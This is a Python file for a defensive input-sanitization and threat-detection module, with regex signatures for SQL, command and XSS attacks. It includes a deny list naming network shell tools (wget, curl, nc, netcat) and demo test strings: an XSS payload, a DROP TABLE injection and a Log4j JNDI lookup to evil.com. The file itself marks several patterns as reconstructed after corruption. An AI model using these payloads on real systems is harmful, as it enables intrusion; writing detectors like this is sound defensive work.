#!/usr/bin/env python3
"""
Comprehensive Security Module

Unified security checks, input sanitization, and threat detection.
"""

import json
import re
import hashlib
import secrets
import datetime
import urllib.parse
import html
from typing import Dict, List, Optional, Any, Tuple, Union
from dataclasses import dataclass
from enum import Enum


class ThreatLevel(Enum):
    """Security threat levels."""
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"


class AttackVector(Enum):
    """Common attack vectors."""
    INJECTION = "injection"
    XSS = "xss"
    CSRF = "csrf"
    PRIVILEGE_ESCALATION = "privilege_escalation"
    RECONNAISSANCE = "reconnaissance"
    DOS = "dos"
    BRUTE_FORCE = "brute_force"
    TIMING = "timing"


@dataclass
class SecurityAlert:
    """Security alert data structure."""
    threat_level: ThreatLevel
    attack_vector: AttackVector
    description: str
    source: str
    timestamp: str  # ISO-8601 string (datetime.isoformat())
    evidence: Dict[str, Any]
    recommendation: str
    blocked: bool


@dataclass
class SanitizationResult:
    """Input sanitization result."""
    original_input: str
    sanitized_input: str
    threats_detected: List[SecurityAlert]
    safe: bool
    modifications_made: bool
    risk_score: float  # 0.0 - 100.0


@dataclass
class SecurityPolicy:
    """Security policy configuration."""
    max_input_length: int
    allowed_characters: str
    forbidden_patterns: List[str]
    rate_limit_enabled: bool
    request_timeout: int
    audit_logging: bool


class ComprehensiveSecurityModule:
    """Enterprise-grade comprehensive security module.

    Provides input sanitization, attack-pattern detection (injection, XSS,
    malicious payloads), request-level validation (IP blocklist, user-agent
    and header checks, request-size limits), simple per-source rate limiting,
    and aggregated security reporting.
    """

    def __init__(self, policy: Optional[SecurityPolicy] = None):
        """Initialize the module with an optional custom policy.

        Args:
            policy: Security policy to enforce; a sensible default is used
                when omitted.
        """
        self.policy = policy or self._default_security_policy()
        self.alert_log: List[SecurityAlert] = []
        self.blocked_ips: set = set()
        # source -> list of request timestamps (epoch seconds)
        self.rate_limiter: Dict[str, List[float]] = {}

        # Security patterns and signatures
        self.injection_patterns = self._initialize_injection_patterns()
        self.xss_patterns = self._initialize_xss_patterns()
        self.malicious_payloads = self._initialize_malicious_payloads()
        self.suspicious_user_agents = self._initialize_suspicious_user_agents()

        # Input sanitization rules, applied in insertion order.
        # A rule returns either the sanitized string, or a
        # (sanitized, alerts, risk_delta) tuple.
        self.sanitization_rules = {
            "html_escape": self._html_escape_input,
            "url_encode": self._url_encode_input,
            "remove_control_chars": self._remove_control_characters,
            "normalize_whitespace": self._normalize_whitespace,
            "validate_encoding": self._validate_encoding,
            "check_length": self._check_input_length,
        }

    def sanitize_and_validate_input(self, input_data: str,
                                    input_type: str = "general",
                                    source: str = "unknown") -> SanitizationResult:
        """Comprehensive input sanitization and validation.

        Args:
            input_data: Raw, untrusted input.
            input_type: Caller-supplied category label (kept for interface
                compatibility; not currently used by any rule).
            source: Identifier of the input's origin (e.g. an IP address);
                used for alerting, auto-blocking, and rate limiting.

        Returns:
            SanitizationResult with the sanitized text, detected threats,
            an aggregate risk score, and an overall safe/unsafe verdict.
        """
        if not input_data:
            return SanitizationResult(
                original_input="",
                sanitized_input="",
                threats_detected=[],
                safe=True,
                modifications_made=False,
                risk_score=0.0
            )

        original_input = input_data
        current_input = input_data
        threats_detected: List[SecurityAlert] = []
        modifications_made = False
        risk_score = 0.0

        # Step 1: Apply sanitization rules
        for rule_name, rule_func in self.sanitization_rules.items():
            try:
                sanitized_result = rule_func(current_input)
                if isinstance(sanitized_result, tuple):
                    new_input, rule_threats, rule_score = sanitized_result
                    if new_input != current_input:
                        modifications_made = True
                        current_input = new_input
                    threats_detected.extend(rule_threats)
                    risk_score += rule_score
                else:
                    if sanitized_result != current_input:
                        modifications_made = True
                        current_input = sanitized_result
            except Exception as e:
                # A failing rule must not abort the pipeline; record it as a
                # low-severity alert and continue with the remaining rules.
                threats_detected.append(SecurityAlert(
                    threat_level=ThreatLevel.LOW,
                    attack_vector=AttackVector.INJECTION,
                    description=f"Sanitization rule {rule_name} failed: {e}",
                    source=source,
                    timestamp=datetime.datetime.now().isoformat(),
                    evidence={"rule": rule_name, "error": str(e)},
                    recommendation="Review sanitization rule implementation",
                    blocked=False
                ))

        # Step 2: Detect specific attack patterns on the ORIGINAL input.
        # Bug fix: the previous implementation scanned the sanitized text,
        # but html-escaping and URL-encoding in Step 1 rewrite quotes,
        # spaces, and angle brackets, so signatures such as `drop\s+table`
        # or `<script` could never match.  Detection must see the raw bytes
        # the attacker sent.
        injection_threats = self._detect_injection_attacks(original_input, source)
        xss_threats = self._detect_xss_attacks(original_input, source)
        payload_threats = self._detect_malicious_payloads(original_input, source)

        threats_detected.extend(injection_threats)
        threats_detected.extend(xss_threats)
        threats_detected.extend(payload_threats)

        # Step 3: Calculate final risk score (weighted by severity)
        for threat in threats_detected:
            if threat.threat_level == ThreatLevel.CRITICAL:
                risk_score += 50.0
            elif threat.threat_level == ThreatLevel.HIGH:
                risk_score += 25.0
            elif threat.threat_level == ThreatLevel.MEDIUM:
                risk_score += 10.0
            elif threat.threat_level == ThreatLevel.LOW:
                risk_score += 5.0

        # Step 4: Determine if input is safe
        critical_threats = [t for t in threats_detected
                            if t.threat_level in [ThreatLevel.CRITICAL, ThreatLevel.HIGH]]
        safe = len(critical_threats) == 0 and risk_score < 30.0

        # Step 5: Log and block if necessary
        if threats_detected:
            self.alert_log.extend(threats_detected)
            # Auto-block critical threats (only for identified sources)
            for threat in threats_detected:
                if threat.threat_level == ThreatLevel.CRITICAL and source != "unknown":
                    self.blocked_ips.add(source)
                    threat.blocked = True

        # Step 6: Apply rate limiting
        if self.policy.rate_limit_enabled:
            self._apply_rate_limiting(source)

        return SanitizationResult(
            original_input=original_input,
            sanitized_input=current_input,
            threats_detected=threats_detected,
            safe=safe,
            modifications_made=modifications_made,
            risk_score=min(risk_score, 100.0)
        )

    def validate_request_security(self, request_data: Dict[str, Any],
                                  headers: Dict[str, str],
                                  ip_address: str) -> List[SecurityAlert]:
        """Validate overall request security.

        Checks the IP blocklist, the User-Agent header, spoofing-related
        headers, and total request size.

        Returns:
            A list of SecurityAlert objects (empty when nothing suspicious
            was found).  Alerts are returned to the caller, not appended to
            the module's alert log.
        """
        alerts: List[SecurityAlert] = []

        # Check IP blocklist — a blocked IP short-circuits all other checks.
        if ip_address in self.blocked_ips:
            alerts.append(SecurityAlert(
                threat_level=ThreatLevel.CRITICAL,
                attack_vector=AttackVector.BRUTE_FORCE,
                description="Request from blocked IP address",
                source=ip_address,
                timestamp=datetime.datetime.now().isoformat(),
                evidence={"ip": ip_address},
                recommendation="IP is permanently blocked",
                blocked=True
            ))
            return alerts

        # Check User-Agent
        user_agent = headers.get("User-Agent", "")
        suspicious_ua = self._detect_suspicious_user_agent(user_agent, ip_address)
        alerts.extend(suspicious_ua)

        # Check for common attack patterns in headers
        header_attacks = self._detect_header_attacks(headers, ip_address)
        alerts.extend(header_attacks)

        # Check request size (JSON-serialized body plus all header bytes)
        request_size = len(json.dumps(request_data)) + sum(
            len(k) + len(v) for k, v in headers.items()
        )
        if request_size > self.policy.max_input_length * 10:  # 10x multiplier for requests
            alerts.append(SecurityAlert(
                threat_level=ThreatLevel.MEDIUM,
                attack_vector=AttackVector.DOS,
                description="Oversized request detected",
                source=ip_address,
                timestamp=datetime.datetime.now().isoformat(),
                evidence={"size": request_size,
                          "max_allowed": self.policy.max_input_length * 10},
                recommendation="Reduce request size or increase limits",
                blocked=False
            ))

        return alerts

    def get_security_report(self, hours: int = 24) -> Dict[str, Any]:
        """Generate comprehensive security report.

        Args:
            hours: Look-back window over the alert log.

        Returns:
            Dict with alert counts by threat level and attack vector, top
            alert sources, a 0-100 security score, and recommendations.
        """
        cutoff_time = datetime.datetime.now() - datetime.timedelta(hours=hours)
        recent_alerts = [
            alert for alert in self.alert_log
            if datetime.datetime.fromisoformat(alert.timestamp) > cutoff_time
        ]

        # Categorize alerts
        threat_counts = {level.value: 0 for level in ThreatLevel}
        attack_vector_counts = {vector.value: 0 for vector in AttackVector}
        for alert in recent_alerts:
            threat_counts[alert.threat_level.value] += 1
            attack_vector_counts[alert.attack_vector.value] += 1

        # Top sources by alert count
        top_sources: Dict[str, int] = {}
        for alert in recent_alerts:
            top_sources[alert.source] = top_sources.get(alert.source, 0) + 1

        # Calculate security score: critical alerts cost 20 points each,
        # high alerts 10, everything else 1; floor at 0.
        total_threats = len(recent_alerts)
        critical_count = threat_counts["critical"]
        high_count = threat_counts["high"]
        security_score = max(0, 100 - (critical_count * 20) - (high_count * 10)
                             - (total_threats - critical_count - high_count))

        return {
            "timeframe_hours": hours,
            "total_alerts": total_threats,
            "security_score": security_score,
            "threat_levels": threat_counts,
            "attack_vectors": attack_vector_counts,
            "top_sources": dict(sorted(top_sources.items(),
                                       key=lambda x: x[1], reverse=True)[:10]),
            "blocked_ips_count": len(self.blocked_ips),
            "recommendations": self._generate_security_recommendations(recent_alerts)
        }

    def _default_security_policy(self) -> SecurityPolicy:
        """Default security policy configuration."""
        return SecurityPolicy(
            max_input_length=10000,
            allowed_characters=("abcdefghijklmnopqrstuvwxyz"
                                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                                "0123456789 .,!?-_@#$%^&*()[]{}|:;<>"),
            forbidden_patterns=[
                # NOTE(review): pattern reconstructed from a corrupted source
                # (angle brackets were stripped); confirm against the original.
                r'<script[^>]*>.*?</script>',
                r'javascript:',
                r'eval\s*\(',
                r'exec\s*\(',
                r'system\s*\(',
                r'passthru\s*\(',
                r'shell_exec\s*\(',
                r'union.*select',
                r'drop.*table',
                r'insert.*into',
                r'delete.*from',
                r'update.*set',
                r'alert\s*\(',
                r'confirm\s*\(',
                r'prompt\s*\('
            ],
            rate_limit_enabled=True,
            request_timeout=30,
            audit_logging=True
        )

    def _initialize_injection_patterns(self) -> List[str]:
        """Initialize SQL injection and command injection patterns."""
        return [
            r"['\"]\s*or\s*['\"][\w]*['\"]\s*=\s*['\"]",
            r"union\s+select",
            r"insert\s+into",
            r"delete\s+from",
            r"update\s+.*\s+set",
            r"drop\s+table",
            r"create\s+table",
            r"alter\s+table",
            r"exec\s*\(",
            r"system\s*\(",
            r"eval\s*\(",
            r"passthru\s*\(",
            r"shell_exec\s*\(",
            r"`[^`]*`",          # backtick command substitution
            r"\$\([^)]*\)",      # $(...) command substitution
            r";\s*(rm|del|format|mkfs)",
            r"[|&]\s*(rm|del|format|mkfs)",
            r"<\?php",
            # NOTE(review): the next two entries were stripped by source
            # corruption; reconstructed as server-side/script tag openers.
            r"<%",
            r"<script",
            r"javascript:",
            r"on\w+\s*="
        ]

    def _initialize_xss_patterns(self) -> List[str]:
        """Initialize XSS attack patterns.

        NOTE(review): this method's body was lost to source corruption
        (the stripped `<...>` span swallowed it); the list below is a
        reconstruction — confirm against the original file.
        """
        return [
            r"<script[^>]*>",
            r"</script>",
            r"javascript:",
            r"vbscript:",
            r"on\w+\s*=",            # inline event handlers (onerror=, onload=, ...)
            r"<iframe",
            r"<object",
            r"<embed",
            r"<img[^>]*onerror",
            r"alert\s*\(",
            r"confirm\s*\(",
            r"prompt\s*\(",
            r"document\.cookie",
            r"document\.write",
            r"window\.location",
            r"expression\s*\("       # legacy IE CSS expression()
        ]

    def _initialize_malicious_payloads(self) -> List[str]:
        """Initialize known malicious payload patterns."""
        return [
            r"cmd\.exe",
            r"powershell",
            r"/bin/bash",
            r"/bin/sh",
            r"wget\s+",
            r"curl\s+",
            r"nc\s+",
            r"netcat",
            r"telnet",
            r"ssh\s+",
            r"ftp\s+",
            r"tftp\s+",
            r"base64_decode",
            r"gzinflate",
            r"str_rot13",
            r"chr\s*\(",
            r"ord\s*\(",
            r"pack\s*\(",
            r"unpack\s*\("
        ]

    def _initialize_suspicious_user_agents(self) -> List[str]:
        """Initialize suspicious user agent patterns (scanners and tooling)."""
        return [
            r"sqlmap", r"nikto", r"nmap", r"masscan", r"zap", r"burp",
            r"sqlninja", r"havij", r"pangolin", r"bbscan", r"netsparker",
            r"acunetix", r"appscan", r"webinspect", r"arachni", r"skipfish",
            r"w3af", r"hydra", r"medusa", r"patator", r"dirbuster",
            r"gobuster", r"wfuzz", r"ffuf",
            # Generic automation clients — noisy but worth flagging.
            r"python-requests", r"curl/", r"wget/", r"perl", r"java/"
        ]

    def _detect_injection_attacks(self, input_data: str, source: str) -> List[SecurityAlert]:
        """Detect SQL injection and command injection attempts."""
        alerts: List[SecurityAlert] = []
        lower_input = input_data.lower()
        for pattern in self.injection_patterns:
            if re.search(pattern, lower_input, re.IGNORECASE):
                alerts.append(SecurityAlert(
                    threat_level=ThreatLevel.HIGH,
                    attack_vector=AttackVector.INJECTION,
                    description=f"Injection attack pattern detected: {pattern}",
                    source=source,
                    timestamp=datetime.datetime.now().isoformat(),
                    evidence={"pattern": pattern, "input_sample": input_data[:100]},
                    recommendation="Input contains potential injection attack",
                    blocked=False
                ))
        return alerts

    def _detect_xss_attacks(self, input_data: str, source: str) -> List[SecurityAlert]:
        """Detect XSS attack attempts."""
        alerts: List[SecurityAlert] = []
        lower_input = input_data.lower()
        for pattern in self.xss_patterns:
            if re.search(pattern, lower_input, re.IGNORECASE):
                alerts.append(SecurityAlert(
                    threat_level=ThreatLevel.HIGH,
                    attack_vector=AttackVector.XSS,
                    description=f"XSS attack pattern detected: {pattern}",
                    source=source,
                    timestamp=datetime.datetime.now().isoformat(),
                    evidence={"pattern": pattern, "input_sample": input_data[:100]},
                    recommendation="Input contains potential XSS attack",
                    blocked=False
                ))
        return alerts

    def _detect_malicious_payloads(self, input_data: str, source: str) -> List[SecurityAlert]:
        """Detect malicious payload patterns."""
        alerts: List[SecurityAlert] = []
        lower_input = input_data.lower()
        for pattern in self.malicious_payloads:
            if re.search(pattern, lower_input, re.IGNORECASE):
                alerts.append(SecurityAlert(
                    threat_level=ThreatLevel.HIGH,
                    attack_vector=AttackVector.INJECTION,
                    description=f"Malicious payload detected: {pattern}",
                    source=source,
                    timestamp=datetime.datetime.now().isoformat(),
                    evidence={"pattern": pattern, "input_sample": input_data[:100]},
                    recommendation="Input contains potentially malicious payload",
                    blocked=False
                ))
        return alerts

    def _detect_suspicious_user_agent(self, user_agent: str, source: str) -> List[SecurityAlert]:
        """Detect suspicious user agents."""
        alerts: List[SecurityAlert] = []
        lower_ua = user_agent.lower()
        for pattern in self.suspicious_user_agents:
            if re.search(pattern, lower_ua):
                alerts.append(SecurityAlert(
                    threat_level=ThreatLevel.MEDIUM,
                    attack_vector=AttackVector.RECONNAISSANCE,
                    description=f"Suspicious user agent detected: {pattern}",
                    source=source,
                    timestamp=datetime.datetime.now().isoformat(),
                    evidence={"user_agent": user_agent, "pattern": pattern},
                    recommendation="Monitor this source for reconnaissance activity",
                    blocked=False
                ))
        return alerts

    def _detect_header_attacks(self, headers: Dict[str, str], source: str) -> List[SecurityAlert]:
        """Detect attacks in HTTP headers (currently: IP-spoofing headers)."""
        alerts: List[SecurityAlert] = []

        # Headers commonly abused to spoof the client IP.
        suspicious_headers = [
            "X-Forwarded-For", "X-Real-IP", "X-Originating-IP",
            "X-Remote-IP", "X-Remote-Addr"
        ]
        for header in suspicious_headers:
            if header in headers:
                alerts.append(SecurityAlert(
                    threat_level=ThreatLevel.LOW,
                    attack_vector=AttackVector.PRIVILEGE_ESCALATION,
                    description=f"Suspicious header detected: {header}",
                    source=source,
                    timestamp=datetime.datetime.now().isoformat(),
                    evidence={"header": header, "value": headers[header]},
                    recommendation="Monitor for IP spoofing attempts",
                    blocked=False
                ))
        return alerts

    def _html_escape_input(self, input_data: str) -> str:
        """HTML escape input data."""
        return html.escape(input_data)

    def _url_encode_input(self, input_data: str) -> str:
        """URL encode input data."""
        return urllib.parse.quote(input_data)

    def _remove_control_characters(self, input_data: str) -> str:
        """Remove control characters except newline and tab."""
        return ''.join(char for char in input_data
                       if char.isprintable() or char in ['\n', '\t'])

    def _normalize_whitespace(self, input_data: str) -> str:
        """Collapse runs of whitespace into single spaces and trim the ends."""
        return re.sub(r'\s+', ' ', input_data.strip())

    def _validate_encoding(self, input_data: str) -> Tuple[str, List[SecurityAlert], float]:
        """Validate input encoding via a UTF-8 round-trip.

        Returns:
            (possibly-replaced input, alerts, risk-score delta).
        """
        alerts: List[SecurityAlert] = []
        score = 0.0
        try:
            encoded = input_data.encode('utf-8')
            decoded = encoded.decode('utf-8')
            if decoded != input_data:
                alerts.append(SecurityAlert(
                    threat_level=ThreatLevel.LOW,
                    attack_vector=AttackVector.INJECTION,
                    description="Input encoding anomaly detected",
                    source="encoding_validation",
                    timestamp=datetime.datetime.now().isoformat(),
                    evidence={"original_length": len(input_data),
                              "decoded_length": len(decoded)},
                    recommendation="Check for encoding-based attacks",
                    blocked=False
                ))
                score += 5.0
            return decoded, alerts, score
        except UnicodeError as e:
            # Undecodable input (e.g. lone surrogates) is rejected outright.
            alerts.append(SecurityAlert(
                threat_level=ThreatLevel.MEDIUM,
                attack_vector=AttackVector.INJECTION,
                description=f"Invalid encoding detected: {e}",
                source="encoding_validation",
                timestamp=datetime.datetime.now().isoformat(),
                evidence={"error": str(e)},
                recommendation="Invalid input encoding",
                blocked=False
            ))
            return "", alerts, 15.0

    def _check_input_length(self, input_data: str) -> Tuple[str, List[SecurityAlert], float]:
        """Check input length against policy; truncates oversized input.

        Returns:
            (truncated input, alerts, risk-score delta).
        """
        alerts: List[SecurityAlert] = []
        score = 0.0
        if len(input_data) > self.policy.max_input_length:
            alerts.append(SecurityAlert(
                threat_level=ThreatLevel.MEDIUM,
                attack_vector=AttackVector.DOS,
                description="Input exceeds maximum length",
                source="length_validation",
                timestamp=datetime.datetime.now().isoformat(),
                evidence={"length": len(input_data),
                          "max_allowed": self.policy.max_input_length},
                recommendation="Input too long",
                blocked=False
            ))
            score += 10.0
        return input_data[:self.policy.max_input_length], alerts, score

    def _apply_rate_limiting(self, source: str) -> None:
        """Apply rate limiting to prevent abuse.

        Keeps a sliding one-hour window of request timestamps per source and
        adds the source to the blocklist when it exceeds 100 requests/hour.
        """
        current_time = datetime.datetime.now().timestamp()
        if source not in self.rate_limiter:
            self.rate_limiter[source] = []

        # Drop requests older than 1 hour from the window.
        self.rate_limiter[source] = [
            req_time for req_time in self.rate_limiter[source]
            if current_time - req_time < 3600
        ]

        self.rate_limiter[source].append(current_time)

        # Block sources exceeding 100 requests per hour.
        if len(self.rate_limiter[source]) > 100:
            self.blocked_ips.add(source)

    def _generate_security_recommendations(self, alerts: List[SecurityAlert]) -> List[str]:
        """Generate security recommendations based on alerts."""
        recommendations: List[str] = []

        if len(alerts) > 50:
            recommendations.append(
                "High volume of security alerts - consider increasing protection levels")

        critical_count = len([a for a in alerts if a.threat_level == ThreatLevel.CRITICAL])
        if critical_count > 0:
            recommendations.append(
                f"{critical_count} critical threats detected - immediate action required")

        # Check for common attack patterns
        attack_types = set(alert.attack_vector for alert in alerts)
        if AttackVector.INJECTION in attack_types:
            recommendations.append("Injection attacks detected - review input sanitization")
        if AttackVector.XSS in attack_types:
            recommendations.append("XSS attacks detected - implement stronger output encoding")
        if AttackVector.RECONNAISSANCE in attack_types:
            recommendations.append("Reconnaissance activity detected - consider IP blocking")

        return recommendations


def demo_comprehensive_security():
    """Demonstrate comprehensive security capabilities."""
    print("=== Comprehensive Security Module Demo ===\n")

    security_module = ComprehensiveSecurityModule()

    # Demo 1: Input sanitization
    print("--- Input Sanitization Demo ---")
    test_inputs = [
        "Normal input text",
        # NOTE(review): this entry was stripped to "" by source corruption;
        # reconstructed as a representative single-tag XSS payload.
        "<img src=x onerror=alert(1)>",
        "'; DROP TABLE users; --",
        "javascript:alert('xss')",
        "Hello\x00\x01\x02world",
        "A" * 15000,  # Oversized input
        "Normal user input with special chars: @#$%^&*()",
        "${jndi:ldap://evil.com/a}",  # Log4j-like payload
    ]

    for test_input in test_inputs:
        result = security_module.sanitize_and_validate_input(
            test_input, input_type="user_input", source="demo_user"
        )
        print(f"Input: {test_input[:50]}...")
        print(f"Safe: {'✅' if result.safe else '❌'}")
        print(f"Risk Score: {result.risk_score:.1f}")
        print(f"Threats Detected: {len(result.threats_detected)}")
        print(f"Modified: {'✅' if result.modifications_made else '❌'}")
        if result.threats_detected:
            for threat in result.threats_detected[:2]:  # Show top 2
                print(f"  {threat.threat_level.value.upper()}: {threat.description}")
        print()

    # Demo 2: Request validation
    print("--- Request Validation Demo ---")
    test_request = {
        "data": "test data"
    }
    test_headers = {
        "User-Agent": "sqlmap/1.0",
        "X-Forwarded-For": "192.168.1.100",
        "Content-Type": "application/json"
    }

    alerts = security_module.validate_request_security(
        test_request, test_headers, "192.168.1.50"
    )
    print(f"Security alerts: {len(alerts)}")
    for alert in alerts:
        print(f"  {alert.threat_level.value.upper()}: {alert.description}")
    print()

    # Demo 3: Security report
    print("--- Security Report Demo ---")
    report = security_module.get_security_report(hours=1)
    print(f"Security Score: {report['security_score']}/100")
    print(f"Total Alerts: {report['total_alerts']}")
    print(f"Threat Levels: {report['threat_levels']}")
    print(f"Attack Vectors: {report['attack_vectors']}")
    if report['recommendations']:
        print("Recommendations:")
        for rec in report['recommendations']:
            print(f"  💡 {rec}")


if __name__ == "__main__":
    demo_comprehensive_security()